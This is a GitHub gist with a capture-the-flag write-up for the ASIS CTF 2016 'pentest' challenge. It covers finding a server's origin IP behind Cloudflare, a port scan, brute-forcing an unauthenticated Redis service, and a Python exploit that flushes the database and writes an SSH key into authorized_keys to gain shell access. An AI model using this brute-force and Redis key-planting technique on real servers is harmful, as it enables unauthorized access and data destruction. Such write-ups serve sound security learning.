Skip to content

Instantly share code, notes, and snippets.

@stypr stypr/README.md
Last active Jun 22, 2019

Embed
What would you like to do?
ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/

Description

We got a suspicious web service which does nothing at all. If you have time to test it, please help me to leak out all data from it. Thanks!

Hint: The server keeps your access log on submission.

Solution

By searching around for a bit, contact.php had a very suspicious content.

<h5>By clicking send button, you hereby agree that all your access information are allowed to be reviewed.<h4>
<!-- Note: It's all for analytics.. Don't worry, we won't harm you. -->

By analyzing the contact.php, there was a weird URL check in Referer header.

POST /contact.php HTTP/1.1
Host: ca12379f1163ff045b3ac80842d15bdb.gdn
Connection: keep-alive
Content-Length: 109
Pragma: no-cache
Cache-Control: no-cache
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,zh-CN;q=0.2,zh;q=0.2
Referer: file:///etc/passwd
Cookie: __cfduid=d22559f51eaf8ee0cd770a1564dc3f8f81473527951

fname=name&address=http%3A%2F%2Flocalhost&email=root%40localhost&phone=phone+number&message=message&send=send

HTTP/1.1 200 OK
Date: Sun, 11 Sep 2016 15:22:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: cloudflare-nginx
CF-RAY: 2e0c1e2bbfde3a54-ICN

3aa
(... skipped some tags ..)
<div id="body">Invalid
6
param.
0

Then I changed the Referer to https://ctf.stypr.com/test.php and got an real IP address of the domain.

For further pentesting, I assumed that discovering real IP would be the best (cloudflare is a cdn service for websites, so it won't point out server's IP addresses.) way to work out, to inspect deeper parts of service.

66.172.33.176 (-) [11/Sep/2016:12:31:48 +0900] "GET /test.php HTTP/1.1" 200 505 "-" 0.005

From here, I used nmap to see if there are any vulnerable ports open.

$ nmap -sT 66.172.33.176 -p1024-10240

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-11 12:41 JST
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 46.79% done; ETC: 00:27 (0:00:33 remaining)
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.48% done; ETC: 00:27 (0:00:17 remaining)
Nmap scan report for ip-66-172-33-176.chunkhost.com (66.172.33.176)
Host is up (0.11s latency).
Not shown: 10157 closed ports
PORT     STATE    SERVICE
3702/tcp filtered unknown
6226/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 54.48 seconds

Then I connected to the 6226 port to check for available commands, and then realized that it was redis running behind.

$ nc 66.172.33.176 6226
HELP
-ERR unknown command 'HELP'
INFO
-NOAUTH Authentication required.
AUTH stypr
-ERR invalid password

There are a lot of redis brute force attacking tools available online, however, I made my own brute forcer since it's easy to make and tools like enteletaor didn't work out well.

I used the top 10000 password wordlist and got the correct authentication with the password crunch.

Then I looked and googled for any possible redis vulnerability and found this good resource.

Now the only left part to find is to look for the correct username.

Since that the website was made by acid (as seen in footer of the website), I assumed the username is acid and wrote an exploit for the challenge.

Please check exploit.py to view the sourcecode.

$ python exploit.py
Password: crunch
OK
  OK
    OK
      OK
        OK
          ASIS{55ab63e61cac968dd1da217dab2d86b8}
                                                Connection to 66.172.33.176 closed.

Flag

ASIS{55ab63e61cac968dd1da217dab2d86b8}

#!/usr/bin/python -u
#-*- coding: utf-8 -*-
#Exploit reference: http://antirez.com/news/96
from pwn import *
import os
import socket
import time
def check_pass(host, port, pw):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((host, port))
s.sendall("AUTH %s\n" % (pw,))
if 'OK' in s.recv(1024):
return True
else:
return False
except:
return False
HOST = '66.172.33.176'
PORT = 6226
# gen pubkey payload
PUBKEY = '\n\nssh-rsa (REDACTED) root@stypr\n\n'
f = open("payload.txt", "w")
f.write(PUBKEY)
f.close()
# bruteforce for password (top 10k)
word_list = file('word.txt').readlines()
for i in word_list:
check = check_pass(HOST, PORT, i)
if check:
# push payload
print("Password: %s" % (i,))
os.system("redis-cli -h %s -p %s -a %s flushall" % (HOST, PORT, i,))
os.system("cat ./payload.txt | redis-cli -h %s -p %s -a %s -x set pwn" % (HOST, PORT, i,))
# set config
os.system("redis-cli -h %s -p %s -a %s config set dir /home/acid/.ssh" % (HOST, PORT, i,))
os.system("redis-cli -h %s -p %s -a %s config set dbfilename \"authorized_keys\"" % (HOST, PORT, i))
# save db
os.system("redis-cli -h %s -p %s -a %s save" % (HOST, PORT, i))
# wait
time.sleep(2)
# ssh to get the flag
os.system("ssh acid@%s" % (HOST))
exit()
# ASIS{55ab63e61cac968dd1da217dab2d86b8}
@manoelt

This comment has been minimized.

Copy link

commented Sep 12, 2016

Good job!

Nice writeup, ty.

@ellcs

This comment has been minimized.

Copy link

commented Sep 13, 2016

Ty

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.